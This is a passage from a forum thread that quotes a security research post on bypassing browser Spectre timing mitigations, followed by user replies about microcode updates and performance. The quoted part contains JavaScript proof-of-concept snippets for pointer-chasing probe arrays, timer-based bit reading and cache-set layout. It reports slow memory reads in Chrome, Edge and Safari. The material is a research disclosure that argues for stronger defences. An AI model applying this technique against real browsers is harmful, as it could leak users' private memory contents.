    //probeArrBitValueOne slots were cached and accessed faster so the count is higher and the secret bit value is 1
    } else {
    //probeArrBitValueZero slots were cached and accessed faster so the count is higher and the secret bit value is 0
    }

    This code didn’t provide the wanted results as the memory fetches for the probe array were executed out of order and at the same time by the CPU, so we didn’t get the wanted amplification. To overcome this, we assigned each slot in the probe arrays with the index of the next slot such as this:

    for (var i = 0; i < SLOT_COUNT; i++) {
    probeArrBitValueZero = i + 1;
    }
    for (var i = 0; i < SLOT_COUNT; i++) {
    probeArrBitValueOne = i + 1;
    }

    The query code was changed to:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    var index = 0;

    for (var i = 0; i < SLOT_COUNT; i++) {
    // Iterations are ensured to perform in order, not simultaneously,
    // since each iteration depends on the result of the previous one.
    index = probeArrBitValueZero[index];
    }
    globalVar += index;

    var zeroCount = 0;

    while (performance.now() == curTick) {
    zeroCount++;
    }

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    index = 0;
    for (var i = 0; i < SLOT_COUNT; i++) {
    // Iterations are ensured to perform in order, not simultaneously,
    // since each iteration depends on the result of the previous one.
    index = probeArrBitValueOne[index];
    }
    globalVar += index;

    var oneCount = 0;

    while (performance.now() == curTick) {
    oneCount++;
    }

    if (oneCount > zeroCount) {
    //probeArrBitValueOne slots were cached and accessed faster so the count is higher and the secret bit value is 1
    } else {
    //probeArrBitValueZero slots were cached and accessed faster so the count is higher and the secret bit value is 0
    }

    This way, out of order fetches are not possible as the CPU can’t know the next address to be fetched before completing the previous fetch.

    Using this approach together with performing the test multiple times for each bit and taking the average as the final result, we were able to read secret bits successfully.

    To implement this approach, we had to make sure that different probe arrays for bit value 1 and bit value 0 were not using the same cache sets, and that accessing each slot would not prefetch any other slots. To achieve this, we used a single large array, and used different indices inside it to implement sub-arrays. Each slot was a page apart from the previous slot - to prevent pre-fetches and to make sure it is not in the same cache-set (different values for bits 13 and above). The beginning of a new sub array is at an offset of 1/4 page from the end of the last page of the last slot of the previous sub array. This way we ensured that the slots of each sub-array have different 10-11 address bits so they use different cache-sets.

    Main Array:
    -----------------------------------------------------------------------
    |Sub-array0 |1024 Bytes|Sub-array1 |
    |------------------------- |(1/4 Page)|------------------------- |
    | Page0| Page1| | | Page0| Page1| |
    |------ |------ | | |------ |------ | |
    |Slot0| |Slot1| |... | |Slot0| |Slot1| |... |
    ----------------------------------------------------------------------- ...

    To flush the cache before each test for the 2 probe sub arrays, we used another, much larger sub-array, and accessed it at indices with the same address values for bits 10-12 of the slots of the 2 probe arrays slots. We constructed it such that if the main array was present in a contiguous, non-fragmented physical memory space, then these accessed slots would use the same cache-sets as the probe arrays slots.

    Implications
    In this presented research we were able to show that even with the implemented Spectre mitigations, we were able to:
    1. Read speculatively accessed memory in Chrome at around 1 bit per second.

    2. Read accessed memory in Edge (not speculatively accessed) at around 1 bit per second.

    3. Read accessed memory in Safari (not speculatively accessed) at around 1 bit per second.
    We were not able use these techniques in Firefox, as they recently reduced the timer resolution to 2ms. The techinque presented here is potentially relevant even for this timer resolution, but some parameter tweaking is required.

    This is not a full exploit, but a POC of overcoming some of the browsers’ Spectre mitigations.

    We didn’t implement the technique for accessing out-of-bounds data, that works with the index masking mitigations in the POC. However, it should work using code similar to what was presented in this post.

    Microsoft did not publish the index masking mitigation in its mitigations page, which might mean that this could be used in Edge to access any memory address in the browser address space, and have arbitrary read access to any such address.

    Further research
    This read bandwidth could potentially be improved by tweaking the code and parameters. Other, better methods for accessing out-of-bounds data that work with the Spectre mitigations in place, could improve the effectiveness of this POC.
    Conclusions
    This research shows that while the timing mitigations implemented in different browsers are effective at dramatically slowing down Spectre-like attacks, they are not effective at preventing them. This means that more robust solutions are required, such as site-isolation and index masking. These timing mitigations are hurting performance and functionality for some web applications, and taking into account their limited effectiveness, reverting them should be considered."
     
    Last edited: Jul 2, 2018
  6. Vasudev

    Vasudev Notebook Prophet

    Reputations:
    3,290
    Messages:
    6,323
    Likes Received:
    4,128
    Trophy Points:
    431
    So like CERT said, replacing hardware is cheaper than SW sh**.
    I bet Intel ousted ex CEO because of this reason alone!.
    I reckon Intel won't recall all their faulty products even a 2 decade old chips for Ryzen TR.
     
    hmscott likes this.
  7. Robbo99999

    Robbo99999 Notebook Prophet

    Reputations:
    3,211
    Messages:
    5,559
    Likes Received:
    4,118
    Trophy Points:
    431
    That's not too bad then, you can turn on Strict Site Isolation on Chrome web browser, it just uses a little more RAM, but performance is OK I've found.
     
    hmscott likes this.
  8. Robbo99999

    Robbo99999 Notebook Prophet

    Reputations:
    3,211
    Messages:
    5,559
    Likes Received:
    4,118
    Trophy Points:
    431
    Damn, so both my Sandybridge CPU in my laptop & my Skylake CPU in my desktop are gonna be getting another new 'Spectre-protected' microcode - wonder how much performance hit this one will have this time around! My Skylake CPU saw a 3% drop in performance using C2 microcode in worst case, but how much extra performance hit from using the C6 microcode that is due to come out soon (perhaps it will be released through Microsoft again).
     
    hmscott likes this.
  9. Vasudev

    Vasudev Notebook Prophet

    Reputations:
    3,290
    Messages:
    6,323
    Likes Received:
    4,128
    Trophy Points:
    431
    on C6 microcode skylake, the matters are worse.
     
    hmscott likes this.
  10. Robbo99999

    Robbo99999 Notebook Prophet

    Reputations:
    3,211
    Messages:
    5,559
    Likes Received:
    4,118
    Trophy Points:
    431
    Well that wouldn't surprise me that performance would be worse with C6 microcode. Have you got some links you can show me re performance of C6 microcode?
     
    Vasudev likes this.
Loading...

Share This Page